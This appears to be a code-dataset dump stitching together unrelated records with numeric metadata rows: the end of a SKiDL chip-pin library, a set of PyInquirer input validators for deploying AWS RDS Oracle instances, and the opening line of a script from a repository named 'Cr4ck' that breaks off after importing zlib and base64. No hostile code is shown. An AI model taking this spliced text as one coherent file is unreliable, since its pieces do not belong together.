Pin(num='1',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='VDD',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS2401P',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1-Wire 1Wire Maxim Dallas ID',description='Silicon Serial Number TSSOP-6',ref_prefix='U',num_units=1,fplist=['TSSOP-6'],do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True)]),
Part(name='DS2401Z',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1-Wire 1Wire Maxim Dallas ID',description='Silicon Serial Number SOT-223',ref_prefix='U',num_units=1,fplist=['SOT-223', 'SOT-223*'],do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS2482-100',dest=TEMPLATE,tool=SKIDL,keywords='1-Wire I2C',description='Single-Channel 1-Wire Master, SOIC-8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9mm*Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='SCL',do_erc=True),
Pin(num='5',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='PCTLZ',func=Pin.OUTPUT,do_erc=True),
Pin(num='7',name='AD1',do_erc=True),
Pin(num='8',name='AD0',do_erc=True)]),
Part(name='DS28EA00',dest=TEMPLATE,tool=SKIDL,keywords='1Wire OneWire Maxim Dallas',description='1-Wire Digital Thermometer with Sequence Detect and PIO',ref_prefix='U',num_units=1,fplist=['MSOP-8_3x3mm_Pitch0.65mm', 'MSOP-8_3x3mm_Pitch0.65mm*'],do_erc=True,pins=[
Pin(num='1',name='IO',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='PIOA',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='PIOB',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='VCC',func=Pin.PWRIN,do_erc=True)]),
Part(name='DS3231',dest=TEMPLATE,tool=SKIDL,keywords='RTC TCXO Realtime Time Clock Crystal Oscillator I2C',description='Extremely Accurate I2C-Integrated RTC/TCXO/Crystal SOIC-16',ref_prefix='U',num_units=1,fplist=['SOIC-*_7.5x10.3mm_Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='32KHZ',func=Pin.OPENCOLL,do_erc=True),
Pin(num='2',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='~INT~/SQW',func=Pin.OPENCOLL,do_erc=True),
Pin(num='4',name='~RST',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='8',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='9',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='10',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='11',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='12',name='NC',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='SCL',do_erc=True)]),
Part(name='DS3231MZ',dest=TEMPLATE,tool=SKIDL,keywords='RTC TCXO Realtime Time Clock MEMS I2C',description='±5ppm, I2C Real-Time Clock SOIC-8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9mm*Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='32KHZ',func=Pin.OPENCOLL,do_erc=True),
Pin(num='2',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='~INT~/SQW',func=Pin.OPENCOLL,do_erc=True),
Pin(num='4',name='~RST',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='7',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='SCL',do_erc=True)]),
Part(name='DS3232M',dest=TEMPLATE,tool=SKIDL,keywords='RTC TCXO Realtime Time Clock MEMS SRAM I2C',description='±5ppm, I2C Real-Time Clock with SRAM SOIC-8',ref_prefix='U',num_units=1,fplist=['SOIC-*_3.9x4.9mm_Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='32KHZ',func=Pin.OUTPUT,do_erc=True),
Pin(num='2',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='~INT~/SQW',func=Pin.OPENCOLL,do_erc=True),
Pin(num='4',name='~RST',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='7',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='SCL',do_erc=True)]),
Part(name='MAX1248',dest=TEMPLATE,tool=SKIDL,keywords='10-Bit ADC Serial 4-Channel Maxim',description='4-Channel 10-Bit ADC with Serial Interface, +2.7V to +5.25V, Low-Power',ref_prefix='U',num_units=1,fplist=['DIP*', 'QSOP*'],do_erc=True,aliases=['MAX1249'],pins=[
Pin(num='1',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='CH0',do_erc=True),
Pin(num='3',name='CH1',do_erc=True),
Pin(num='4',name='CH2',do_erc=True),
Pin(num='5',name='CH3',do_erc=True),
Pin(num='6',name='COM',func=Pin.PWRIN,do_erc=True),
Pin(num='7',name='~SHDN',func=Pin.TRISTATE,do_erc=True),
Pin(num='8',name='VREF',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='REFADJ',do_erc=True),
Pin(num='10',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='DGND',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='DOUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='13',name='SSTRB',func=Pin.OUTPUT,do_erc=True),
Pin(num='14',name='DIN',do_erc=True),
Pin(num='15',name='~CS',do_erc=True),
Pin(num='16',name='SCLK',do_erc=True)]),
Part(name='MAX2606',dest=TEMPLATE,tool=SKIDL,do_erc=True,aliases=['MAX2505', 'MAX2507', 'MAX2508', 'MAX2509']),
Part(name='MAX31820',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1-Wire 1Wire Maxim Dallas',description='1-Wire Ambient Temperature Sensor',ref_prefix='U',num_units=1,fplist=['TO-92_*'],do_erc=True,aliases=['DS1822', 'DS18B20', 'DS18S20', 'DS1821C'],pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='VDD',func=Pin.PWRIN,do_erc=True)]),
Part(name='MAX31820PAR',dest=TEMPLATE,tool=SKIDL,keywords='OneWire 1-Wire 1Wire Maxim Dallas',description='1-Wire, Parasite-Power, Ambient Temperature Sensor',ref_prefix='U',num_units=1,fplist=['TO-92_*'],do_erc=True,aliases=['DS1822-PAR', 'DS18B20-PAR', 'DS18S20-PAR', 'DS2401'],pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True)]),
Part(name='MAX31826',dest=TEMPLATE,tool=SKIDL,keywords='1Wire OneWire Maxim Dallas',description='1-Wire Digital Temperature Sensor with 1Kb Lockable EEPROM',ref_prefix='U',num_units=1,fplist=['MSOP-8_3x3mm_Pitch0.65mm', 'MSOP-8_3x3mm_Pitch0.65mm*'],do_erc=True,pins=[
Pin(num='1',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='DQ',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='AD0',do_erc=True),
Pin(num='6',name='AD1',do_erc=True),
Pin(num='7',name='AD2',do_erc=True),
Pin(num='8',name='AD3',do_erc=True)]),
Part(name='MAX453',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='MAX5436',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='MAX6355',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='MAX7325AEG+',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='Max691',dest=TEMPLATE,tool=SKIDL,do_erc=True)])
| 80.56 | 305 | 0.624486 | 2,298 | 14,098 | 3.729765 | 0.097476 | 0.098588 | 0.177459 | 0.173609 | 0.886128 | 0.871544 | 0.867343 | 0.815774 | 0.765138 | 0.718119 | 0 | 0.051759 | 0.161299 | 14,098 | 174 | 306 | 81.022989 | 0.672953 | 0 | 0 | 0.354651 | 0 | 0.005814 | 0.199887 | 0.029082 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.151163 | 0.005814 | 0 | 0.005814 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
71265ffa427e3827efca9687a07121bd15532f2e | 13,919 | py | Python | cli/cli_validators.py | salbac/AWS-RDS-Deploy | b70ce3769dbd5f1fc0d0b6681c0dc01ac4277181 | [
"MIT"
] | null | null | null | cli/cli_validators.py | salbac/AWS-RDS-Deploy | b70ce3769dbd5f1fc0d0b6681c0dc01ac4277181 | [
"MIT"
] | null | null | null | cli/cli_validators.py | salbac/AWS-RDS-Deploy | b70ce3769dbd5f1fc0d0b6681c0dc01ac4277181 | [
"MIT"
] | null | null | null | from PyInquirer import ValidationError, Validator
import re
import string
class RdsInstanceNameValidator(Validator):
def validate(self, document):
if len(document.text) < 1 or len(document.text) > 64:
raise ValidationError(message='Instance name must be length between 1 to 64 characters')
allowed = (set(string.ascii_letters).union(set(string.digits))).union('-')
if not all(c in allowed for c in document.text):
raise ValidationError(message='The instance name only allows numbers, letters or -')
for i in range(len(document.text)):
if i != 0:
if document.text[i] == document.text[i-1]:
raise ValidationError(message="The instance name can't contain 2 consecutive -")
if document.text.endswith('-'):
raise ValidationError(message="The instance name can't finish with -")
class OracleSystemIdValidator(Validator):
def validate(self, document):
oracle_reserved_words = ["ACCESS", "ACCOUNT", "ACTIVATE", "ADD", "ADMIN", "ADVISE", "AFTER", "ALL", "ALL_ROWS", "ALLOCATE", "ALTER", "ANALYZE", "AND", "ANY", "ARCHIVE", "ARCHIVELOG", "ARRAY", "AS", "ASC", "AT", "AUDIT", "AUTHENTICATED", "AUTHORIZATION", "AUTOEXTEND", "AUTOMATIC", "BACKUP", "BECOME", "BEFORE", "BEGIN", "BETWEEN", "BFILE", "BITMAP", "BLOB", "BLOCK", "BODY", "BY", "CACHE", "CACHE_INSTANCES", "CANCEL", "CASCADE", "CAST", "CFILE", "CHAINED", "CHANGE", "CHAR", "CHAR_CS", "CHARACTER", "CHECK", "CHECKPOINT", "CHOOSE", "CHUNK", "CLEAR", "CLOB", "CLONE", "CLOSE", "CLOSE_CACHED_OPEN_CURSORS", "CLUSTER", "COALESCE", "COLUMN", "COLUMNS", "COMMENT", "COMMIT", "COMMITTED", "COMPATIBILITY", "COMPILE", "COMPLETE", "COMPOSITE_LIMIT", "COMPRESS", "COMPUTE", "CONNECT", "CONNECT_TIME", "CONSTRAINT", "CONSTRAINTS", "CONTENTS", "CONTINUE", "CONTROLFILE", "CONVERT", "COST", "CPU_PER_CALL", "CPU_PER_SESSION", "CREATE", "CURRENT", "CURRENT_SCHEMA", "CURREN_USER", "CURSOR", "CYCLE", " ", "DANGLING", "DATABASE", "DATAFILE", "DATAFILES", "DATAOBJNO", "DATE", "DBA", "DBHIGH", "DBLOW", "DBMAC", "DEALLOCATE", "DEBUG", "DEC", "DECIMAL", "DECLARE", "DEFAULT", "DEFERRABLE", "DEFERRED", "DEGREE", "DELETE", "DEREF", "DESC", "DIRECTORY", "DISABLE", "DISCONNECT", "DISMOUNT", "DISTINCT", "DISTRIBUTED", "DML", "DOUBLE", "DROP", "DUMP", "EACH", "ELSE", "ENABLE", "END", "ENFORCE", "ENTRY", "ESCAPE", "EXCEPT", "EXCEPTIONS", "EXCHANGE", "EXCLUDING", "EXCLUSIVE", "EXECUTE", "EXISTS", "EXPIRE", "EXPLAIN", "EXTENT", "EXTENTS", "EXTERNALLY", "FAILED_LOGIN_ATTEMPTS", "FALSE", "FAST", "FILE", "FIRST_ROWS", "FLAGGER", "FLOAT", "FLOB", "FLUSH", "FOR", "FORCE", "FOREIGN", "FREELIST", "FREELISTS", "FROM", "FULL", "FUNCTION", "GLOBAL", "GLOBALLY", "GLOBAL_NAME", "GRANT", "GROUP", "GROUPS", "HASH", "HASHKEYS", "HAVING", "HEADER", "HEAP", "IDENTIFIED", "IDGENERATORS", "IDLE_TIME", "IF", "IMMEDIATE", "IN", "INCLUDING", "INCREMENT", "INDEX", "INDEXED", "INDEXES", "INDICATOR", "IND_PARTITION", "INITIAL", "INITIALLY", "INITRANS", "INSERT", "INSTANCE", "INSTANCES", "INSTEAD", "INT", "INTEGER", "INTERMEDIATE", "INTERSECT", "INTO", "IS", "ISOLATION", "ISOLATION_LEVEL", "KEEP", "KEY", "KILL", "LABEL", "LAYER", "LESS", "LEVEL", "LIBRARY", "LIKE", "LIMIT", "LINK", "LIST", "LOB", "LOCAL", "LOCK", "LOCKED", "LOG", "LOGFILE", "LOGGING", "LOGICAL_READS_PER_CALL", "LOGICAL_READS_PER_SESSION", "LONG", "MANAGE", "MASTER", "MAX", "MAXARCHLOGS", "MAXDATAFILES", "MAXEXTENTS", "MAXINSTANCES", "MAXLOGFILES", "MAXLOGHISTORY", "MAXLOGMEMBERS", "MAXSIZE", "MAXTRANS", "MAXVALUE", "MIN", "MEMBER", "MINIMUM", "MINEXTENTS", "MINUS", "MINVALUE", "MLSLABEL", "MLS_LABEL_FORMAT", "MODE", "MODIFY", "MOUNT", "MOVE", "MTS_DISPATCHERS", "MULTISET", "NATIONAL", "NCHAR", "NCHAR_CS", "NCLOB", "NEEDED", "NESTED", "NETWORK", "NEW", "NEXT", "NOARCHIVELOG", "NOAUDIT", "NOCACHE", "NOCOMPRESS", "NOCYCLE", "NOFORCE", "NOLOGGING", "NOMAXVALUE", "NOMINVALUE", "NONE", "NOORDER", "NOOVERRIDE", "NOPARALLEL", "NOPARALLEL", "NOREVERSE", "NORMAL", "NOSORT", "NOT", "NOTHING", "NOWAIT", "NULL", "NUMBER", "NUMERIC", "NVARCHAR2", "OBJECT", "OBJNO", "OBJNO_REUSE", "OF", "OFF", "OFFLINE", "OID", "OIDINDEX", "OLD", "ON", "ONLINE", "ONLY", "OPCODE", "OPEN", "OPTIMAL", "OPTIMIZER_GOAL", "OPTION", "OR", "ORDER", "ORGANIZATION", "OSLABEL", "OVERFLOW", "OWN", "PACKAGE", "PARALLEL", "PARTITION", "PASSWORD", "PASSWORD_GRACE_TIME", "PASSWORD_LIFE_TIME", "PASSWORD_LOCK_TIME", "PASSWORD_REUSE_MAX", "PASSWORD_REUSE_TIME", "PASSWORD_VERIFY_FUNCTION", "PCTFREE", "PCTINCREASE", "PCTTHRESHOLD", "PCTUSED", "PCTVERSION", "PERCENT", "PERMANENT", "PLAN", "PLSQL_DEBUG", "POST_TRANSACTION", "PRECISION", "PRESERVE", "PRIMARY", "PRIOR", "PRIVATE", "PRIVATE_SGA", "PRIVILEGE", "PRIVILEGES", "PROCEDURE", "PROFILE", "PUBLIC", "PURGE", "QUEUE", "QUOTA", "RANGE", "RAW", "RBA", "READ", "READUP", "REAL", "REBUILD", "RECOVER", "RECOVERABLE", "RECOVERY", "REF", "REFERENCES", "REFERENCING", "REFRESH", "RENAME", "REPLACE", "RESET", "RESETLOGS", "RESIZE", "RESOURCE", "RESTRICTED", "RETURN", "RETURNING", "REUSE", "REVERSE", "REVOKE", "ROLE", "ROLES", "ROLLBACK", "ROW", "ROWID", "ROWNUM", "ROWS", "RULE", "SAMPLE", "SAVEPOINT", "SB4", "SCAN_INSTANCES", "SCHEMA", "SCN", "SCOPE", "SD_ALL", "SD_INHIBIT", "SD_SHOW", "SEGMENT", "SEG_BLOCK", "SEG_FILE", "SELECT", "SEQUENCE", "SERIALIZABLE", "SESSION", "SESSION_CACHED_CURSORS", "SESSIONS_PER_USER", "SET", "SHARE", "SHARED", "SHARED_POOL", "SHRINK", "SIZE", "SKIP", "SKIP_UNUSABLE_INDEXES", "SMALLINT", "SNAPSHOT", "SOME", "SORT", "SPECIFICATION", "SPLIT", "SQL_TRACE", "STANDBY", "START", "STATEMENT_ID", "STATISTICS", "STOP", "STORAGE", "STORE", "STRUCTURE", "SUCCESSFUL", "SWITCH", "SYS_OP_ENFORCE_NOT_NULL$", "SYS_OP_NTCIMG$", "SYNONYM", "SYSDATE", "SYSDBA", "SYSOPER", "SYSTEM", "TABLE", "TABLES", "TABLESPACE", "TABLESPACE_NO", "TABNO", "TEMPORARY", "THAN", "THE", "THEN", "THREAD", "TIMESTAMP", "TIME", "TO", "TOPLEVEL", "TRACE", "TRACING", "TRANSACTION", "TRANSITIONAL", "TRIGGER", "TRIGGERS", "TRUE", "TRUNCATE", "TX", "TYPE", "UB2", "UBA", "UID", "UNARCHIVED", "UNDO", "UNION", "UNIQUE", "UNLIMITED", "UNLOCK", "UNRECOVERABLE", "UNTIL", "UNUSABLE", "UNUSED", "UPDATABLE", "UPDATE", "USAGE", "USE", "USER", "USING", "VALIDATE", "VALIDATION", "VALUE", "VALUES", "VARCHAR", "VARCHAR2", "VARYING", "VIEW", "WHEN", "WHENEVER", "WHERE", "WITH", "WITHOUT", "WORK", "WRITE", "WRITEDOWN", "WRITEUP", "XID", "YEAR", "ZONE"]
if document.text.upper() in oracle_reserved_words:
raise ValidationError(message="Can't use Oracle reserved words.")
elif len(document.text) == 0 or len(document.text) > 8:
raise ValidationError(message='SID must be length between 1 to 8 characters')
class EmptyValidator(Validator):
def validate(self, document):
if len(document.text) == 0:
raise ValidationError(message='Enter value')
class IntegerValidator(Validator):
def validate(self, document):
if len(document.text) == 0:
raise ValidationError(message='Enter value')
try:
int(document.text)
except:
raise ValidationError(message='Enter valid integer value')
class PortValidator(Validator):
def validate(self, document):
if len(document.text) == 0:
raise ValidationError(message='Enter value')
if int(document.text) not in range(1150, 65535):
raise ValidationError(message='Enter valid port number in range 1150-65535')
try:
int(document.text)
except:
raise ValidationError(message='Enter valid integer value')
class MasterUsernameValidator(Validator):
def validate(self, document):
if len(document.text) < 1 or len(document.text) > 30:
raise ValidationError(message='Master Username must be length between 8 to 30 characters')
oracle_reserved_words = ["ACCESS", "ACCOUNT", "ACTIVATE", "ADD", "ADMIN", "ADVISE", "AFTER", "ALL", "ALL_ROWS", "ALLOCATE", "ALTER", "ANALYZE", "AND", "ANY", "ARCHIVE", "ARCHIVELOG", "ARRAY", "AS", "ASC", "AT", "AUDIT", "AUTHENTICATED", "AUTHORIZATION", "AUTOEXTEND", "AUTOMATIC", "BACKUP", "BECOME", "BEFORE", "BEGIN", "BETWEEN", "BFILE", "BITMAP", "BLOB", "BLOCK", "BODY", "BY", "CACHE", "CACHE_INSTANCES", "CANCEL", "CASCADE", "CAST", "CFILE", "CHAINED", "CHANGE", "CHAR", "CHAR_CS", "CHARACTER", "CHECK", "CHECKPOINT", "CHOOSE", "CHUNK", "CLEAR", "CLOB", "CLONE", "CLOSE", "CLOSE_CACHED_OPEN_CURSORS", "CLUSTER", "COALESCE", "COLUMN", "COLUMNS", "COMMENT", "COMMIT", "COMMITTED", "COMPATIBILITY", "COMPILE", "COMPLETE", "COMPOSITE_LIMIT", "COMPRESS", "COMPUTE", "CONNECT", "CONNECT_TIME", "CONSTRAINT", "CONSTRAINTS", "CONTENTS", "CONTINUE", "CONTROLFILE", "CONVERT", "COST", "CPU_PER_CALL", "CPU_PER_SESSION", "CREATE", "CURRENT", "CURRENT_SCHEMA", "CURREN_USER", "CURSOR", "CYCLE", " ", "DANGLING", "DATABASE", "DATAFILE", "DATAFILES", "DATAOBJNO", "DATE", "DBA", "DBHIGH", "DBLOW", "DBMAC", "DEALLOCATE", "DEBUG", "DEC", "DECIMAL", "DECLARE", "DEFAULT", "DEFERRABLE", "DEFERRED", "DEGREE", "DELETE", "DEREF", "DESC", "DIRECTORY", "DISABLE", "DISCONNECT", "DISMOUNT", "DISTINCT", "DISTRIBUTED", "DML", "DOUBLE", "DROP", "DUMP", "EACH", "ELSE", "ENABLE", "END", "ENFORCE", "ENTRY", "ESCAPE", "EXCEPT", "EXCEPTIONS", "EXCHANGE", "EXCLUDING", "EXCLUSIVE", "EXECUTE", "EXISTS", "EXPIRE", "EXPLAIN", "EXTENT", "EXTENTS", "EXTERNALLY", "FAILED_LOGIN_ATTEMPTS", "FALSE", "FAST", "FILE", "FIRST_ROWS", "FLAGGER", "FLOAT", "FLOB", "FLUSH", "FOR", "FORCE", "FOREIGN", "FREELIST", "FREELISTS", "FROM", "FULL", "FUNCTION", "GLOBAL", "GLOBALLY", "GLOBAL_NAME", "GRANT", "GROUP", "GROUPS", "HASH", "HASHKEYS", "HAVING", "HEADER", "HEAP", "IDENTIFIED", "IDGENERATORS", "IDLE_TIME", "IF", "IMMEDIATE", "IN", "INCLUDING", "INCREMENT", "INDEX", "INDEXED", "INDEXES", "INDICATOR", "IND_PARTITION", "INITIAL", "INITIALLY", "INITRANS", "INSERT", "INSTANCE", "INSTANCES", "INSTEAD", "INT", "INTEGER", "INTERMEDIATE", "INTERSECT", "INTO", "IS", "ISOLATION", "ISOLATION_LEVEL", "KEEP", "KEY", "KILL", "LABEL", "LAYER", "LESS", "LEVEL", "LIBRARY", "LIKE", "LIMIT", "LINK", "LIST", "LOB", "LOCAL", "LOCK", "LOCKED", "LOG", "LOGFILE", "LOGGING", "LOGICAL_READS_PER_CALL", "LOGICAL_READS_PER_SESSION", "LONG", "MANAGE", "MASTER", "MAX", "MAXARCHLOGS", "MAXDATAFILES", "MAXEXTENTS", "MAXINSTANCES", "MAXLOGFILES", "MAXLOGHISTORY", "MAXLOGMEMBERS", "MAXSIZE", "MAXTRANS", "MAXVALUE", "MIN", "MEMBER", "MINIMUM", "MINEXTENTS", "MINUS", "MINVALUE", "MLSLABEL", "MLS_LABEL_FORMAT", "MODE", "MODIFY", "MOUNT", "MOVE", "MTS_DISPATCHERS", "MULTISET", "NATIONAL", "NCHAR", "NCHAR_CS", "NCLOB", "NEEDED", "NESTED", "NETWORK", "NEW", "NEXT", "NOARCHIVELOG", "NOAUDIT", "NOCACHE", "NOCOMPRESS", "NOCYCLE", "NOFORCE", "NOLOGGING", "NOMAXVALUE", "NOMINVALUE", "NONE", "NOORDER", "NOOVERRIDE", "NOPARALLEL", "NOPARALLEL", "NOREVERSE", "NORMAL", "NOSORT", "NOT", "NOTHING", "NOWAIT", "NULL", "NUMBER", "NUMERIC", "NVARCHAR2", "OBJECT", "OBJNO", "OBJNO_REUSE", "OF", "OFF", "OFFLINE", "OID", "OIDINDEX", "OLD", "ON", "ONLINE", "ONLY", "OPCODE", "OPEN", "OPTIMAL", "OPTIMIZER_GOAL", "OPTION", "OR", "ORDER", "ORGANIZATION", "OSLABEL", "OVERFLOW", "OWN", "PACKAGE", "PARALLEL", "PARTITION", "PASSWORD", "PASSWORD_GRACE_TIME", "PASSWORD_LIFE_TIME", "PASSWORD_LOCK_TIME", "PASSWORD_REUSE_MAX", "PASSWORD_REUSE_TIME", "PASSWORD_VERIFY_FUNCTION", "PCTFREE", "PCTINCREASE", "PCTTHRESHOLD", "PCTUSED", "PCTVERSION", "PERCENT", "PERMANENT", "PLAN", "PLSQL_DEBUG", "POST_TRANSACTION", "PRECISION", "PRESERVE", "PRIMARY", "PRIOR", "PRIVATE", "PRIVATE_SGA", "PRIVILEGE", "PRIVILEGES", "PROCEDURE", "PROFILE", "PUBLIC", "PURGE", "QUEUE", "QUOTA", "RANGE", "RAW", "RBA", "READ", "READUP", "REAL", "REBUILD", "RECOVER", "RECOVERABLE", "RECOVERY", "REF", "REFERENCES", "REFERENCING", "REFRESH", "RENAME", "REPLACE", "RESET", "RESETLOGS", "RESIZE", "RESOURCE", "RESTRICTED", "RETURN", "RETURNING", "REUSE", "REVERSE", "REVOKE", "ROLE", "ROLES", "ROLLBACK", "ROW", "ROWID", "ROWNUM", "ROWS", "RULE", "SAMPLE", "SAVEPOINT", "SB4", "SCAN_INSTANCES", "SCHEMA", "SCN", "SCOPE", "SD_ALL", "SD_INHIBIT", "SD_SHOW", "SEGMENT", "SEG_BLOCK", "SEG_FILE", "SELECT", "SEQUENCE", "SERIALIZABLE", "SESSION", "SESSION_CACHED_CURSORS", "SESSIONS_PER_USER", "SET", "SHARE", "SHARED", "SHARED_POOL", "SHRINK", "SIZE", "SKIP", "SKIP_UNUSABLE_INDEXES", "SMALLINT", "SNAPSHOT", "SOME", "SORT", "SPECIFICATION", "SPLIT", "SQL_TRACE", "STANDBY", "START", "STATEMENT_ID", "STATISTICS", "STOP", "STORAGE", "STORE", "STRUCTURE", "SUCCESSFUL", "SWITCH", "SYS_OP_ENFORCE_NOT_NULL$", "SYS_OP_NTCIMG$", "SYNONYM", "SYSDATE", "SYSDBA", "SYSOPER", "SYSTEM", "TABLE", "TABLES", "TABLESPACE", "TABLESPACE_NO", "TABNO", "TEMPORARY", "THAN", "THE", "THEN", "THREAD", "TIMESTAMP", "TIME", "TO", "TOPLEVEL", "TRACE", "TRACING", "TRANSACTION", "TRANSITIONAL", "TRIGGER", "TRIGGERS", "TRUE", "TRUNCATE", "TX", "TYPE", "UB2", "UBA", "UID", "UNARCHIVED", "UNDO", "UNION", "UNIQUE", "UNLIMITED", "UNLOCK", "UNRECOVERABLE", "UNTIL", "UNUSABLE", "UNUSED", "UPDATABLE", "UPDATE", "USAGE", "USE", "USER", "USING", "VALIDATE", "VALIDATION", "VALUE", "VALUES", "VARCHAR", "VARCHAR2", "VARYING", "VIEW", "WHEN", "WHENEVER", "WHERE", "WITH", "WITHOUT", "WORK", "WRITE", "WRITEDOWN", "WRITEUP", "XID", "YEAR", "ZONE"]
if document.text.upper() in oracle_reserved_words:
raise ValidationError(message="Can't use Oracle reserved words.")
if document.text[0] not in set(string.ascii_letters):
raise ValidationError(message="The first master username character must be a letter.")
class MasterPasswordValidator(Validator):
def validate(self, document):
nok = re.findall("[/@]", document.text)
if nok:
raise ValidationError(message="Password can't contain / or @ ")
if len(document.text) < 8 or len(document.text) > 30:
raise ValidationError(message='Password must be length between 8 to 30 characters')
| 180.766234 | 5,416 | 0.646167 | 1,474 | 13,919 | 6 | 0.364315 | 0.031208 | 0.0519 | 0.018996 | 0.901289 | 0.889869 | 0.880145 | 0.880145 | 0.853573 | 0.853573 | 0 | 0.004512 | 0.124291 | 13,919 | 76 | 5,417 | 183.144737 | 0.72106 | 0 | 0 | 0.442623 | 0 | 0 | 0.541745 | 0.026441 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114754 | false | 0.081967 | 0.04918 | 0 | 0.278689 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
854043dd15c2876e35ac74b7461c56781f6e5bfa | 5,319 | py | Python | Contoh1.py | alobay/Cr4ck | 7523a12ef246553ccf0f88baa5179922c50de52a | [
"Apache-2.0"
] | 1 | 2020-11-01T23:41:15.000Z | 2020-11-01T23:41:15.000Z | Contoh1.py | alobay/Cr4ck | 7523a12ef246553ccf0f88baa5179922c50de52a | [
"Apache-2.0"
] | null | null | null | Contoh1.py | alobay/Cr4ck | 7523a12ef246553ccf0f88baa5179922c50de52a | [
"Apache-2.0"
] | null | null | null | import zlib,base64
